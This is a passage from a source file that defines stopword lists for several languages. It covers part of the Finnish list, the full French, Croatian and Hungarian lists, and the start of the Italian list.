        "ole",
        "olemme",
        "olen",
        "olet",
        "olette",
        "oleva",
        "olevan",
        "olevat",
        "oli",
        "olimme",
        "olin",
        "olisi",
        "olisimme",
        "olisin",
        "olisit",
        "olisitte",
        "olisivat",
        "olit",
        "olitte",
        "olivat",
        "olla",
        "olleet",
        "olli",
        "ollut",
        "oma",
        "omaa",
        "omaan",
        "omaksi",
        "omalle",
        "omalta",
        "oman",
        "omassa",
        "omat",
        "omia",
        "omien",
        "omiin",
        "omiksi",
        "omille",
        "omilta",
        "omissa",
        "omista",
        "on",
        "onkin",
        "onko",
        "ovat",
        "paikoittain",
        "paitsi",
        "pakosti",
        "paljon",
        "paremmin",
        "parempi",
        "parhaillaan",
        "parhaiten",
        "perusteella",
        "peräti",
        "pian",
        "pieneen",
        "pieneksi",
        "pienelle",
        "pienellä",
        "pieneltä",
        "pienempi",
        "pienestä",
        "pieni",
        "pienin",
        "puolesta",
        "puolestaan",
        "päälle",
        "runsaasti",
        "saakka",
        "sadam",
        "sama",
        "samaa",
        "samaan",
        "samalla",
        "samallalta",
        "samallassa",
        "samallasta",
        "saman",
        "samat",
        "samoin",
        "sata",
        "sataa",
        "satojen",
        "se",
        "seitsemän",
        "sekä",
        "sen",
        "seuraavat",
        "siellä",
        "sieltä",
        "siihen",
        "siinä",
        "siis",
        "siitä",
        "sijaan",
        "siksi",
        "silloin",
        "sillä",
        "silti",
        "sinne",
        "sinua",
        "sinulle",
        "sinulta",
        "sinun",
        "sinussa",
        "sinusta",
        "sinut",
        "sinä",
        "sisäkkäin",
        "sisällä",
        "siten",
        "sitten",
        "sitä",
        "ssa",
        "sta",
        "suoraan",
        "suuntaan",
        "suuren",
        "suuret",
        "suuri",
        "suuria",
        "suurin",
        "suurten",
        "taa",
        "taas",
        "taemmas",
        "tahansa",
        "tai",
        "takaa",
        "takaisin",
        "takana",
        "takia",
        "tapauksessa",
        "tarpeeksi",
        "tavalla",
        "tavoitteena",
        "te",
        "tietysti",
        "todella",
        "toinen",
        "toisaalla",
        "toisaalle",
        "toisaalta",
        "toiseen",
        "toiseksi",
        "toisella",
        "toiselle",
        "toiselta",
        "toisemme",
        "toisen",
        "toisensa",
        "toisessa",
        "toisesta",
        "toista",
        "toistaiseksi",
        "toki",
        "tosin",
        "tuhannen",
        "tuhat",
        "tule",
        "tulee",
        "tulemme",
        "tulen",
        "tulet",
        "tulette",
        "tulevat",
        "tulimme",
        "tulin",
        "tulisi",
        "tulisimme",
        "tulisin",
        "tulisit",
        "tulisitte",
        "tulisivat",
        "tulit",
        "tulitte",
        "tulivat",
        "tulla",
        "tulleet",
        "tullut",
        "tuntuu",
        "tuo",
        "tuolla",
        "tuolloin",
        "tuolta",
        "tuonne",
        "tuskin",
        "tykö",
        "tähän",
        "tällä",
        "tällöin",
        "tämä",
        "tämän",
        "tänne",
        "tänä",
        "tänään",
        "tässä",
        "tästä",
        "täten",
        "tätä",
        "täysin",
        "täytyvät",
        "täytyy",
        "täällä",
        "täältä",
        "ulkopuolella",
        "usea",
        "useasti",
        "useimmiten",
        "usein",
        "useita",
        "uudeksi",
        "uudelleen",
        "uuden",
        "uudet",
        "uusi",
        "uusia",
        "uusien",
        "uusinta",
        "uuteen",
        "uutta",
        "vaan",
        "vahemmän",
        "vai",
        "vaiheessa",
        "vaikea",
        "vaikean",
        "vaikeat",
        "vaikeilla",
        "vaikeille",
        "vaikeilta",
        "vaikeissa",
        "vaikeista",
        "vaikka",
        "vain",
        "varmasti",
        "varsin",
        "varsinkin",
        "varten",
        "vasen",
        "vasenmalla",
        "vasta",
        "vastaan",
        "vastakkain",
        "vastan",
        "verran",
        "vielä",
        "vierekkäin",
        "vieressä",
        "vieri",
        "viiden",
        "viime",
        "viimeinen",
        "viimeisen",
        "viimeksi",
        "viisi",
        "voi",
        "voidaan",
        "voimme",
        "voin",
        "voisi",
        "voit",
        "voitte",
        "voivat",
        "vuoden",
        "vuoksi",
        "vuosi",
        "vuosien",
        "vuosina",
        "vuotta",
        "vähemmän",
        "vähintään",
        "vähiten",
        "vähän",
        "välillä",
        "yhdeksän",
        "yhden",
        "yhdessä",
        "yhteen",
        "yhteensä",
        "yhteydessä",
        "yhteyteen",
        "yhtä",
        "yhtäälle",
        "yhtäällä",
        "yhtäältä",
        "yhtään",
        "yhä",
        "yksi",
        "yksin",
        "yksittäin",
        "yleensä",
        "ylemmäs",
        "yli",
        "ylös",
        "ympäri",
        "älköön",
        "älä",
    ],
    "fr": [
        "a",
        "abord",
        "absolument",
        "afin",
        "ah",
        "ai",
        "aie",
        "ailleurs",
        "ainsi",
        "ait",
        "allaient",
        "allo",
        "allons",
        "allô",
        "alors",
        "anterieur",
        "anterieure",
        "anterieures",
        "apres",
        "après",
        "as",
        "assez",
        "attendu",
        "au",
        "aucun",
        "aucune",
        "aujourd",
        "aujourd'hui",
        "aupres",
        "auquel",
        "aura",
        "auraient",
        "aurait",
        "auront",
        "aussi",
        "autre",
        "autrefois",
        "autrement",
        "autres",
        "autrui",
        "aux",
        "auxquelles",
        "auxquels",
        "avaient",
        "avais",
        "avait",
        "avant",
        "avec",
        "avoir",
        "avons",
        "ayant",
        "b",
        "bah",
        "bas",
        "basee",
        "bat",
        "beau",
        "beaucoup",
        "bien",
        "bigre",
        "boum",
        "bravo",
        "brrr",
        "c",
        "car",
        "ce",
        "ceci",
        "cela",
        "celle",
        "celle-ci",
        "celle-là",
        "celles",
        "celles-ci",
        "celles-là",
        "celui",
        "celui-ci",
        "celui-là",
        "cent",
        "cependant",
        "certain",
        "certaine",
        "certaines",
        "certains",
        "certes",
        "ces",
        "cet",
        "cette",
        "ceux",
        "ceux-ci",
        "ceux-là",
        "chacun",
        "chacune",
        "chaque",
        "cher",
        "chers",
        "chez",
        "chiche",
        "chut",
        "chère",
        "chères",
        "ci",
        "cinq",
        "cinquantaine",
        "cinquante",
        "cinquantième",
        "cinquième",
        "clac",
        "clic",
        "combien",
        "comme",
        "comment",
        "comparable",
        "comparables",
        "compris",
        "concernant",
        "contre",
        "couic",
        "crac",
        "d",
        "da",
        "dans",
        "de",
        "debout",
        "dedans",
        "dehors",
        "deja",
        "delà",
        "depuis",
        "dernier",
        "derniere",
        "derriere",
        "derrière",
        "des",
        "desormais",
        "desquelles",
        "desquels",
        "dessous",
        "dessus",
        "deux",
        "deuxième",
        "deuxièmement",
        "devant",
        "devers",
        "devra",
        "different",
        "differentes",
        "differents",
        "différent",
        "différente",
        "différentes",
        "différents",
        "dire",
        "directe",
        "directement",
        "dit",
        "dite",
        "dits",
        "divers",
        "diverse",
        "diverses",
        "dix",
        "dix-huit",
        "dix-neuf",
        "dix-sept",
        "dixième",
        "doit",
        "doivent",
        "donc",
        "dont",
        "douze",
        "douzième",
        "dring",
        "du",
        "duquel",
        "durant",
        "dès",
        "désormais",
        "e",
        "effet",
        "egale",
        "egalement",
        "egales",
        "eh",
        "elle",
        "elle-même",
        "elles",
        "elles-mêmes",
        "en",
        "encore",
        "enfin",
        "entre",
        "envers",
        "environ",
        "es",
        "est",
        "et",
        "etant",
        "etc",
        "etre",
        "eu",
        "euh",
        "eux",
        "eux-mêmes",
        "exactement",
        "excepté",
        "extenso",
        "exterieur",
        "f",
        "fais",
        "faisaient",
        "faisant",
        "fait",
        "façon",
        "feront",
        "fi",
        "flac",
        "floc",
        "font",
        "g",
        "gens",
        "h",
        "ha",
        "hein",
        "hem",
        "hep",
        "hi",
        "ho",
        "holà",
        "hop",
        "hormis",
        "hors",
        "hou",
        "houp",
        "hue",
        "hui",
        "huit",
        "huitième",
        "hum",
        "hurrah",
        "hé",
        "hélas",
        "i",
        "il",
        "ils",
        "importe",
        "j",
        "je",
        "jusqu",
        "jusque",
        "juste",
        "k",
        "l",
        "la",
        "laisser",
        "laquelle",
        "las",
        "le",
        "lequel",
        "les",
        "lesquelles",
        "lesquels",
        "leur",
        "leurs",
        "longtemps",
        "lors",
        "lorsque",
        "lui",
        "lui-meme",
        "lui-même",
        "là",
        "lès",
        "m",
        "ma",
        "maint",
        "maintenant",
        "mais",
        "malgre",
        "malgré",
        "maximale",
        "me",
        "meme",
        "memes",
        "merci",
        "mes",
        "mien",
        "mienne",
        "miennes",
        "miens",
        "mille",
        "mince",
        "minimale",
        "moi",
        "moi-meme",
        "moi-même",
        "moindres",
        "moins",
        "mon",
        "moyennant",
        "multiple",
        "multiples",
        "même",
        "mêmes",
        "n",
        "na",
        "naturel",
        "naturelle",
        "naturelles",
        "ne",
        "neanmoins",
        "necessaire",
        "necessairement",
        "neuf",
        "neuvième",
        "ni",
        "nombreuses",
        "nombreux",
        "non",
        "nos",
        "notamment",
        "notre",
        "nous",
        "nous-mêmes",
        "nouveau",
        "nul",
        "néanmoins",
        "nôtre",
        "nôtres",
        "o",
        "oh",
        "ohé",
        "ollé",
        "olé",
        "on",
        "ont",
        "onze",
        "onzième",
        "ore",
        "ou",
        "ouf",
        "ouias",
        "oust",
        "ouste",
        "outre",
        "ouvert",
        "ouverte",
        "ouverts",
        "o|",
        "où",
        "p",
        "paf",
        "pan",
        "par",
        "parce",
        "parfois",
        "parle",
        "parlent",
        "parler",
        "parmi",
        "parseme",
        "partant",
        "particulier",
        "particulière",
        "particulièrement",
        "pas",
        "passé",
        "pendant",
        "pense",
        "permet",
        "personne",
        "peu",
        "peut",
        "peuvent",
        "peux",
        "pff",
        "pfft",
        "pfut",
        "pif",
        "pire",
        "plein",
        "plouf",
        "plus",
        "plusieurs",
        "plutôt",
        "possessif",
        "possessifs",
        "possible",
        "possibles",
        "pouah",
        "pour",
        "pourquoi",
        "pourrais",
        "pourrait",
        "pouvait",
        "prealable",
        "precisement",
        "premier",
        "première",
        "premièrement",
        "pres",
        "probable",
        "probante",
        "procedant",
        "proche",
        "près",
        "psitt",
        "pu",
        "puis",
        "puisque",
        "pur",
        "pure",
        "q",
        "qu",
        "quand",
        "quant",
        "quant-à-soi",
        "quanta",
        "quarante",
        "quatorze",
        "quatre",
        "quatre-vingt",
        "quatrième",
        "quatrièmement",
        "que",
        "quel",
        "quelconque",
        "quelle",
        "quelles",
        "quelqu'un",
        "quelque",
        "quelques",
        "quels",
        "qui",
        "quiconque",
        "quinze",
        "quoi",
        "quoique",
        "r",
        "rare",
        "rarement",
        "rares",
        "relative",
        "relativement",
        "remarquable",
        "rend",
        "rendre",
        "restant",
        "reste",
        "restent",
        "restrictif",
        "retour",
        "revoici",
        "revoilà",
        "rien",
        "s",
        "sa",
        "sacrebleu",
        "sait",
        "sans",
        "sapristi",
        "sauf",
        "se",
        "sein",
        "seize",
        "selon",
        "semblable",
        "semblaient",
        "semble",
        "semblent",
        "sent",
        "sept",
        "septième",
        "sera",
        "seraient",
        "serait",
        "seront",
        "ses",
        "seul",
        "seule",
        "seulement",
        "si",
        "sien",
        "sienne",
        "siennes",
        "siens",
        "sinon",
        "six",
        "sixième",
        "soi",
        "soi-même",
        "soit",
        "soixante",
        "son",
        "sont",
        "sous",
        "souvent",
        "specifique",
        "specifiques",
        "speculatif",
        "stop",
        "strictement",
        "subtiles",
        "suffisant",
        "suffisante",
        "suffit",
        "suis",
        "suit",
        "suivant",
        "suivante",
        "suivantes",
        "suivants",
        "suivre",
        "superpose",
        "sur",
        "surtout",
        "t",
        "ta",
        "tac",
        "tant",
        "tardive",
        "te",
        "tel",
        "telle",
        "tellement",
        "telles",
        "tels",
        "tenant",
        "tend",
        "tenir",
        "tente",
        "tes",
        "tic",
        "tien",
        "tienne",
        "tiennes",
        "tiens",
        "toc",
        "toi",
        "toi-même",
        "ton",
        "touchant",
        "toujours",
        "tous",
        "tout",
        "toute",
        "toutefois",
        "toutes",
        "treize",
        "trente",
        "tres",
        "trois",
        "troisième",
        "troisièmement",
        "trop",
        "très",
        "tsoin",
        "tsouin",
        "tu",
        "té",
        "u",
        "un",
        "une",
        "unes",
        "uniformement",
        "unique",
        "uniques",
        "uns",
        "v",
        "va",
        "vais",
        "vas",
        "vers",
        "via",
        "vif",
        "vifs",
        "vingt",
        "vivat",
        "vive",
        "vives",
        "vlan",
        "voici",
        "voilà",
        "vont",
        "vos",
        "votre",
        "vous",
        "vous-mêmes",
        "vu",
        "vé",
        "vôtre",
        "vôtres",
        "w",
        "x",
        "y",
        "z",
        "zut",
        "à",
        "â",
        "ça",
        "ès",
        "étaient",
        "étais",
        "était",
        "étant",
        "été",
        "être",
        "ô",
    ],
    "hr": [
        "a",
        "ako",
        "ali",
        "bi",
        "bih",
        "bila",
        "bili",
        "bilo",
        "bio",
        "bismo",
        "biste",
        "biti",
        "bumo",
        "da",
        "do",
        "duž",
        "ga",
        "hoće",
        "hoćemo",
        "hoćete",
        "hoćeš",
        "hoću",
        "i",
        "iako",
        "ih",
        "ili",
        "iz",
        "ja",
        "je",
        "jedna",
        "jedne",
        "jedno",
        "jer",
        "jesam",
        "jesi",
        "jesmo",
        "jest",
        "jeste",
        "jesu",
        "jim",
        "joj",
        "još",
        "ju",
        "kada",
        "kako",
        "kao",
        "koja",
        "koje",
        "koji",
        "kojima",
        "koju",
        "kroz",
        "li",
        "me",
        "mene",
        "meni",
        "mi",
        "mimo",
        "moj",
        "moja",
        "moje",
        "mu",
        "na",
        "nad",
        "nakon",
        "nam",
        "nama",
        "nas",
        "naš",
        "naša",
        "naše",
        "našeg",
        "ne",
        "nego",
        "neka",
        "neki",
        "nekog",
        "neku",
        "nema",
        "netko",
        "neće",
        "nećemo",
        "nećete",
        "nećeš",
        "neću",
        "nešto",
        "ni",
        "nije",
        "nikoga",
        "nikoje",
        "nikoju",
        "nisam",
        "nisi",
        "nismo",
        "niste",
        "nisu",
        "njega",
        "njegov",
        "njegova",
        "njegovo",
        "njemu",
        "njezin",
        "njezina",
        "njezino",
        "njih",
        "njihov",
        "njihova",
        "njihovo",
        "njim",
        "njima",
        "njoj",
        "nju",
        "no",
        "o",
        "od",
        "odmah",
        "on",
        "ona",
        "oni",
        "ono",
        "ova",
        "pa",
        "pak",
        "po",
        "pod",
        "pored",
        "prije",
        "s",
        "sa",
        "sam",
        "samo",
        "se",
        "sebe",
        "sebi",
        "si",
        "smo",
        "ste",
        "su",
        "sve",
        "svi",
        "svog",
        "svoj",
        "svoja",
        "svoje",
        "svom",
        "ta",
        "tada",
        "taj",
        "tako",
        "te",
        "tebe",
        "tebi",
        "ti",
        "to",
        "toj",
        "tome",
        "tu",
        "tvoj",
        "tvoja",
        "tvoje",
        "u",
        "uz",
        "vam",
        "vama",
        "vas",
        "vaš",
        "vaša",
        "vaše",
        "već",
        "vi",
        "vrlo",
        "za",
        "zar",
        "će",
        "ćemo",
        "ćete",
        "ćeš",
        "ću",
        "što",
    ],
    "hu": [
        "a",
        "abba",
        "abban",
        "abból",
        "addig",
        "ahhoz",
        "ahogy",
        "ahol",
        "aki",
        "akik",
        "akkor",
        "akár",
        "alapján",
        "alatt",
        "alatta",
        "alattad",
        "alattam",
        "alattatok",
        "alattuk",
        "alattunk",
        "alá",
        "alád",
        "alájuk",
        "alám",
        "alánk",
        "alátok",
        "alól",
        "alóla",
        "alólad",
        "alólam",
        "alólatok",
        "alóluk",
        "alólunk",
        "amely",
        "amelybol",
        "amelyek",
        "amelyekben",
        "amelyeket",
        "amelyet",
        "amelyik",
        "amelynek",
        "ami",
        "amikor",
        "amit",
        "amolyan",
        "amott",
        "amíg",
        "annak",
        "annál",
        "arra",
        "arról",
        "attól",
        "az",
        "aznap",
        "azok",
        "azokat",
        "azokba",
        "azokban",
        "azokból",
        "azokhoz",
        "azokig",
        "azokkal",
        "azokká",
        "azoknak",
        "azoknál",
        "azokon",
        "azokra",
        "azokról",
        "azoktól",
        "azokért",
        "azon",
        "azonban",
        "azonnal",
        "azt",
        "aztán",
        "azután",
        "azzal",
        "azzá",
        "azért",
        "bal",
        "balra",
        "ban",
        "be",
        "belé",
        "beléd",
        "beléjük",
        "belém",
        "belénk",
        "belétek",
        "belül",
        "belőle",
        "belőled",
        "belőlem",
        "belőletek",
        "belőlük",
        "belőlünk",
        "ben",
        "benne",
        "benned",
        "bennem",
        "bennetek",
        "bennük",
        "bennünk",
        "bár",
        "bárcsak",
        "bármilyen",
        "búcsú",
        "cikk",
        "cikkek",
        "cikkeket",
        "csak",
        "csakhogy",
        "csupán",
        "de",
        "dehogy",
        "e",
        "ebbe",
        "ebben",
        "ebből",
        "eddig",
        "egy",
        "egyebek",
        "egyebet",
        "egyedül",
        "egyelőre",
        "egyes",
        "egyet",
        "egyetlen",
        "egyik",
        "egymás",
        "egyre",
        "egyszerre",
        "egyéb",
        "együtt",
        "egész",
        "egészen",
        "ehhez",
        "ekkor",
        "el",
        "eleinte",
        "ellen",
        "ellenes",
        "elleni",
        "ellenére",
        "elmondta",
        "első",
        "elsők",
        "elsősorban",
        "elsőt",
        "elé",
        "eléd",
        "elég",
        "eléjük",
        "elém",
        "elénk",
        "elétek",
        "elő",
        "előbb",
        "elől",
        "előle",
        "előled",
        "előlem",
        "előletek",
        "előlük",
        "előlünk",
        "először",
        "előtt",
        "előtte",
        "előtted",
        "előttem",
        "előttetek",
        "előttük",
        "előttünk",
        "előző",
        "emilyen",
        "engem",
        "ennek",
        "ennyi",
        "ennél",
        "enyém",
        "erre",
        "erről",
        "esetben",
        "ettől",
        "ez",
        "ezek",
        "ezekbe",
        "ezekben",
        "ezekből",
        "ezeken",
        "ezeket",
        "ezekhez",
        "ezekig",
        "ezekkel",
        "ezekké",
        "ezeknek",
        "ezeknél",
        "ezekre",
        "ezekről",
        "ezektől",
        "ezekért",
        "ezen",
        "ezentúl",
        "ezer",
        "ezret",
        "ezt",
        "ezután",
        "ezzel",
        "ezzé",
        "ezért",
        "fel",
        "fele",
        "felek",
        "felet",
        "felett",
        "felé",
        "fent",
        "fenti",
        "fél",
        "fölé",
        "gyakran",
        "ha",
        "halló",
        "hamar",
        "hanem",
        "harmadik",
        "harmadikat",
        "harminc",
        "hat",
        "hatodik",
        "hatodikat",
        "hatot",
        "hatvan",
        "helyett",
        "hetedik",
        "hetediket",
        "hetet",
        "hetven",
        "hirtelen",
        "hiszen",
        "hiába",
        "hogy",
        "hogyan",
        "hol",
        "holnap",
        "holnapot",
        "honnan",
        "hova",
        "hozzá",
        "hozzád",
        "hozzájuk",
        "hozzám",
        "hozzánk",
        "hozzátok",
        "hurrá",
        "huszadik",
        "hány",
        "hányszor",
        "hármat",
        "három",
        "hát",
        "hátha",
        "hátulsó",
        "hét",
        "húsz",
        "ide",
        "ide-оda",
        "idén",
        "igazán",
        "igen",
        "ill",
        "illetve",
        "ilyen",
        "ilyenkor",
        "immár",
        "inkább",
        "is",
        "ismét",
        "ison",
        "itt",
        "jelenleg",
        "jobban",
        "jobbra",
        "jó",
        "jól",
        "jólesik",
        "jóval",
        "jövőre",
        "kell",
        "kellene",
        "kellett",
        "kelljen",
        "keressünk",
        "keresztül",
        "ketten",
        "kettő",
        "kettőt",
        "kevés",
        "ki",
        "kiben",
        "kiből",
        "kicsit",
        "kicsoda",
        "kihez",
        "kik",
        "kikbe",
        "kikben",
        "kikből",
        "kiken",
        "kiket",
        "kikhez",
        "kikkel",
        "kikké",
        "kiknek",
        "kiknél",
        "kikre",
        "kikről",
        "kiktől",
        "kikért",
        "kilenc",
        "kilencedik",
        "kilencediket",
        "kilencet",
        "kilencven",
        "kin",
        "kinek",
        "kinél",
        "kire",
        "kiről",
        "kit",
        "kitől",
        "kivel",
        "kivé",
        "kié",
        "kiért",
        "korábban",
        "képest",
        "kérem",
        "kérlek",
        "kész",
        "késő",
        "később",
        "későn",
        "két",
        "kétszer",
        "kívül",
        "körül",
        "köszönhetően",
        "köszönöm",
        "közben",
        "közel",
        "közepesen",
        "közepén",
        "közé",
        "között",
        "közül",
        "külön",
        "különben",
        "különböző",
        "különbözőbb",
        "különbözőek",
        "lassan",
        "le",
        "legalább",
        "legyen",
        "lehet",
        "lehetetlen",
        "lehetett",
        "lehetőleg",
        "lehetőség",
        "lenne",
        "lenni",
        "lennék",
        "lennének",
        "lesz",
        "leszek",
        "lesznek",
        "leszünk",
        "lett",
        "lettek",
        "lettem",
        "lettünk",
        "lévő",
        "ma",
        "maga",
        "magad",
        "magam",
        "magatokat",
        "magukat",
        "magunkat",
        "magát",
        "mai",
        "majd",
        "majdnem",
        "manapság",
        "meg",
        "megcsinál",
        "megcsinálnak",
        "megint",
        "megvan",
        "mellett",
        "mellette",
        "melletted",
        "mellettem",
        "mellettetek",
        "mellettük",
        "mellettünk",
        "mellé",
        "melléd",
        "melléjük",
        "mellém",
        "mellénk",
        "mellétek",
        "mellől",
        "mellőle",
        "mellőled",
        "mellőlem",
        "mellőletek",
        "mellőlük",
        "mellőlünk",
        "mely",
        "melyek",
        "melyik",
        "mennyi",
        "mert",
        "mi",
        "miatt",
        "miatta",
        "miattad",
        "miattam",
        "miattatok",
        "miattuk",
        "miattunk",
        "mibe",
        "miben",
        "miből",
        "mihez",
        "mik",
        "mikbe",
        "mikben",
        "mikből",
        "miken",
        "miket",
        "mikhez",
        "mikkel",
        "mikké",
        "miknek",
        "miknél",
        "mikor",
        "mikre",
        "mikről",
        "miktől",
        "mikért",
        "milyen",
        "min",
        "mind",
        "mindegyik",
        "mindegyiket",
        "minden",
        "mindenesetre",
        "mindenki",
        "mindent",
        "mindenütt",
        "mindig",
        "mindketten",
        "minek",
        "minket",
        "mint",
        "mintha",
        "minél",
        "mire",
        "miről",
        "mit",
        "mitől",
        "mivel",
        "mivé",
        "miért",
        "mondta",
        "most",
        "mostanáig",
        "már",
        "más",
        "másik",
        "másikat",
        "másnap",
        "második",
        "másodszor",
        "mások",
        "másokat",
        "mást",
        "még",
        "mégis",
        "míg",
        "mögé",
        "mögéd",
        "mögéjük",
        "mögém",
        "mögénk",
        "mögétek",
        "mögött",
        "mögötte",
        "mögötted",
        "mögöttem",
        "mögöttetek",
        "mögöttük",
        "mögöttünk",
        "mögül",
        "mögüle",
        "mögüled",
        "mögülem",
        "mögületek",
        "mögülük",
        "mögülünk",
        "múltkor",
        "múlva",
        "na",
        "nagy",
        "nagyobb",
        "nagyon",
        "naponta",
        "napot",
        "ne",
        "negyedik",
        "negyediket",
        "negyven",
        "neked",
        "nekem",
        "neki",
        "nekik",
        "nektek",
        "nekünk",
        "nem",
        "nemcsak",
        "nemrég",
        "nincs",
        "nyolc",
        "nyolcadik",
        "nyolcadikat",
        "nyolcat",
        "nyolcvan",
        "nála",
        "nálad",
        "nálam",
        "nálatok",
        "náluk",
        "nálunk",
        "négy",
        "négyet",
        "néha",
        "néhány",
        "nélkül",
        "o",
        "oda",
        "ok",
        "olyan",
        "onnan",
        "ott",
        "pedig",
        "persze",
        "pár",
        "például",
        "rajta",
        "rajtad",
        "rajtam",
        "rajtatok",
        "rajtuk",
        "rajtunk",
        "rendben",
        "rosszul",
        "rá",
        "rád",
        "rájuk",
        "rám",
        "ránk",
        "rátok",
        "régen",
        "régóta",
        "részére",
        "róla",
        "rólad",
        "rólam",
        "rólatok",
        "róluk",
        "rólunk",
        "rögtön",
        "s",
        "saját",
        "se",
        "sem",
        "semmi",
        "semmilyen",
        "semmiség",
        "senki",
        "soha",
        "sok",
        "sokan",
        "sokat",
        "sokkal",
        "sokszor",
        "sokáig",
        "során",
        "stb.",
        "szemben",
        "szerbusz",
        "szerint",
        "szerinte",
        "szerinted",
        "szerintem",
        "szerintetek",
        "szerintük",
        "szerintünk",
        "szervusz",
        "szinte",
        "számára",
        "száz",
        "századik",
        "százat",
        "szépen",
        "szét",
        "szíves",
        "szívesen",
        "szíveskedjék",
        "sőt",
        "talán",
        "tavaly",
        "te",
        "tegnap",
        "tegnapelőtt",
        "tehát",
        "tele",
        "teljes",
        "tessék",
        "ti",
        "tied",
        "titeket",
        "tizedik",
        "tizediket",
        "tizenegy",
        "tizenegyedik",
        "tizenhat",
        "tizenhárom",
        "tizenhét",
        "tizenkettedik",
        "tizenkettő",
        "tizenkilenc",
        "tizenkét",
        "tizennyolc",
        "tizennégy",
        "tizenöt",
        "tizet",
        "tovább",
        "további",
        "továbbá",
        "távol",
        "téged",
        "tényleg",
        "tíz",
        "több",
        "többi",
        "többször",
        "túl",
        "tőle",
        "tőled",
        "tőlem",
        "tőletek",
        "tőlük",
        "tőlünk",
        "ugyanakkor",
        "ugyanez",
        "ugyanis",
        "ugye",
        "urak",
        "uram",
        "urat",
        "utoljára",
        "utolsó",
        "után",
        "utána",
        "vagy",
        "vagyis",
        "vagyok",
        "vagytok",
        "vagyunk",
        "vajon",
        "valahol",
        "valaki",
        "valakit",
        "valamelyik",
        "valami",
        "valamint",
        "való",
        "van",
        "vannak",
        "vele",
        "veled",
        "velem",
        "veletek",
        "velük",
        "velünk",
        "vissza",
        "viszlát",
        "viszont",
        "viszontlátásra",
        "volna",
        "volnának",
        "volnék",
        "volt",
        "voltak",
        "voltam",
        "voltunk",
        "végre",
        "végén",
        "végül",
        "által",
        "általában",
        "ám",
        "át",
        "éljen",
        "én",
        "éppen",
        "érte",
        "érted",
        "értem",
        "értetek",
        "értük",
        "értünk",
        "és",
        "év",
        "évben",
        "éve",
        "évek",
        "éves",
        "évi",
        "évvel",
        "így",
        "óta",
        "ön",
        "önbe",
        "önben",
        "önből",
        "önhöz",
        "önnek",
        "önnel",
        "önnél",
        "önre",
        "önről",
        "önt",
        "öntől",
        "önért",
        "önök",
        "önökbe",
        "önökben",
        "önökből",
        "önöket",
        "önökhöz",
        "önökkel",
        "önöknek",
        "önöknél",
        "önökre",
        "önökről",
        "önöktől",
        "önökért",
        "önökön",
        "önön",
        "össze",
        "öt",
        "ötven",
        "ötödik",
        "ötödiket",
        "ötöt",
        "úgy",
        "úgyis",
        "úgynevezett",
        "új",
        "újabb",
        "újra",
        "úr",
        "ő",
        "ők",
        "őket",
        "őt",
    ],
    "it": [
        "IE",
        "a",
        "abbastanza",
        "abbia",
        "abbiamo",
        "abbiano",
        "abbiate",
        "accidenti",
        "ad",
        "adesso",
        "affinche",
        "agl",
        "agli",
        "ahime",
        "ahimè",
        "ai",
        "al",
        "alcuna",
        "alcuni",
        "alcuno",
        "all",
        "alla",
        "alle",
        "allo",
        "allora",
        "altri",
        "altrimenti",
        "altro",
        "altrove",
        "altrui",
        "anche",
        "ancora",
        "anni",
        "anno",
        "ansa",
        "anticipo",
        "assai",
        "attesa",
        "attraverso",
        "avanti",
        "avemmo",
        "avendo",
        "avente",
        "aver",
        "avere",
        "averlo",
        "avesse",
        "avessero",
        "avessi",
        "avessimo",
        "aveste",
        "avesti",
        "avete",
        "aveva",
        "avevamo",
        "avevano",
        "avevate",
        "avevi",
        "avevo",
        "avrai",
        "avranno",
        "avrebbe",
        "avrebbero",
        "avrei",
        "avremmo",
        "avremo",
        "avreste",
        "avresti",
        "avrete",
        "avrà",
        "avrò",
        "avuta",
        "avute",
        "avuti",
        "avuto",
        "basta",
        "bene",
        "benissimo",
        "berlusconi",
        "brava",
        "bravo",
        "c",
        "casa",
        "caso",
        "cento",
        "certa",
        "certe",
        "certi",
        "certo",
        "che",
        "chi",
        "chicchessia",
        "chiunque",
        "ci",
        "ciascuna",
        "ciascuno",
        "cima",
        "cio",
        "cioe",
        "cioè",
        "circa",
        "citta",
        "città",
        "ciò",
        "co",
        "codesta",
        "codesti",
        "codesto",
        "cogli",
        "coi",
        "col",
        "colei",
        "coll",
        "coloro",
        "colui",
        "come",
        "cominci",
        "comunque",
        "con",
        "concernente",
        "conciliarsi",
        "conclusione",
        "consiglio",
        "contro",
        "cortesia",
        "cos",
        "cosa",
        "cosi",
        "così",
        "cui",
        "d",
        "da",
        "dagl",
        "dagli",
        "dai",
        "dal",
        "dall",
        "dalla",
        "dalle",
        "dallo",
        "dappertutto",
        "davanti",
        "degl",
        "degli",
        "dei",
        "del",
        "dell",
        "della",
        "delle",
        "dello",
        "dentro",
        "detto",
        "deve",
        "di",
        "dice",
        "dietro",
        "dire",
        "dirimpetto",
        "diventa",
        "diventare",
        "diventato",
        "dopo",
        "dov",
        "dove",
        "dovra",
        "dovrà",
        "dovunque",
        "due",
        "dunque",
        "durante",
        "e",
        "ebbe",
        "ebbero",
        "ebbi",
        "ecc",
        "ecco",
        "ed",
        "effettivamente",
        "egli",
        "ella",
        "entrambi",
        "eppure",
        "era",
        "erano",
        "eravamo",
        "eravate",
        "eri",
        "ero",
        "esempio",
        "esse",
        "essendo",
        "esser",
        "essere",
        "essi",
        "ex",
        "fa",
        "faccia",
        "facciamo",
        "facciano",
        "facciate",
        "faccio",
        "facemmo",
        "facendo",
        "facesse",
        "facessero",
        "facessi",
        "facessimo",
        "faceste",
        "facesti",
        "faceva",
        "facevamo",
        "facevano",
        "facevate",
        "facevi",
        "facevo",
        "fai",
        "fanno",
        "farai",
        "faranno",
        "fare",
        "farebbe",
        "farebbero",
        "farei",
        "faremmo",
        "faremo",
        "fareste",
        "faresti",
        "farete",
        "farà",
        "farò",
        "fatto",
        "favore",
        "fece",
        "fecero",
        "feci",
        "fin",
        "finalmente",
        "finche",
        "fine",
        "fino",
        "forse",
        "forza",
        "fosse",
        "fossero",
        "fossi",
        "fossimo",
        "foste",
        "fosti",
        "fra",
        "frattempo",
        "fu",
        "fui",
        "fummo",
        "fuori",
        "furono",
        "futuro",
        "generale",
        "gia",
        "giacche",
        "giorni",
        "giorno",
        "già",
        "gli",
        "gliela",
        "gliele",
        "glieli",
        "glielo",
        "gliene",
        "governo",
        "grande",
        "grazie",
        "gruppo",
        "ha",
        "haha",
        "hai",
        "hanno",
        "ho",
        "i",
        "ieri",
        "il",
        "improvviso",
        "in",
        "inc",
        "infatti",
        "inoltre",
        "insieme",
        "intanto",
        "intorno",
        "invece",
        "io",
        "l",
        "la",
        "lasciato",
        "lato",
        "lavoro",
        "le",
        "lei",
        "li",
        "lo",
        "lontano",
